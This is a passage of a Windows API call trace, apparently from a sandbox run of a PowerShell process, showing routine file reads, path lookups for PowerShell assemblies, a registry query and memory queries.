GetLastError () returned 0x0 [0141.198] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.198] GetLastError () returned 0x0 [0141.201] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.201] GetLastError () returned 0x0 [0141.201] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.201] GetLastError () returned 0x0 [0141.201] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.201] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.202] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.202] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.203] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.203] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.203] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.203] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.203] GetLastError () returned 0x0 [0141.203] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.204] GetLastError () returned 0x0 [0141.204] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.205] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.205] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0xf37, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x30101cf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x30101cf*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] ReadFile (in: hFile=0x328, lpBuffer=0x3010af8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x3010af8*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.206] GetLastError () returned 0x0 [0141.206] CloseHandle (hObject=0x328) returned 1 [0141.206] GetLastError () returned 0x0 [0141.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0141.207] GetLastError () returned 0x0 [0141.207] SetErrorMode (uMode=0x1) returned 0x1 [0141.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3031af4 | out: lpFileInformation=0x3031af4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0141.207] GetLastError () returned 0x0 [0141.207] SetErrorMode (uMode=0x1) returned 0x1 [0141.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0141.207] GetLastError () returned 0x0 [0141.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.207] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.207] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.208] RegCloseKey (hKey=0x328) returned 0x0 [0141.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0141.208] GetLastError () returned 0x0 [0141.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0141.208] GetLastError () returned 0x0 [0141.218] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x88213732, Data2=0x491f, Data3=0x4bb2, Data4=([0]=0xb1, [1]=0x4b, [2]=0x78, [3]=0x33, [4]=0xfe, [5]=0xe4, [6]=0x4, [7]=0x8e))) returned 0x0 [0141.218] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xf030128f, Data2=0x1261, Data3=0x4bfa, Data4=([0]=0xa8, [1]=0xb0, [2]=0x89, [3]=0x35, [4]=0xe4, [5]=0x20, [6]=0x6f, [7]=0x5a))) returned 0x0 [0141.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.218] GetLastError () returned 0x0 [0141.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.218] GetLastError () returned 0x0 [0141.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.218] GetLastError () returned 0x0 [0141.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.218] GetLastError () returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.304] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x359a82f9, Data2=0x8dcb, Data3=0x4107, Data4=([0]=0x96, [1]=0xad, [2]=0x60, [3]=0x2d, [4]=0xc0, [5]=0x68, [6]=0x26, [7]=0xbf))) returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.304] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.305] GetLastError () returned 0x0 [0141.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.306] GetLastError () returned 0x0 [0141.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.306] GetLastError () returned 0x0 [0141.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.306] GetLastError () returned 0x0 [0141.306] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.307] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.307] GetLastError () returned 0x0 [0141.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.307] GetLastError () returned 0x0 [0141.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.307] GetLastError () returned 0x0 [0141.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 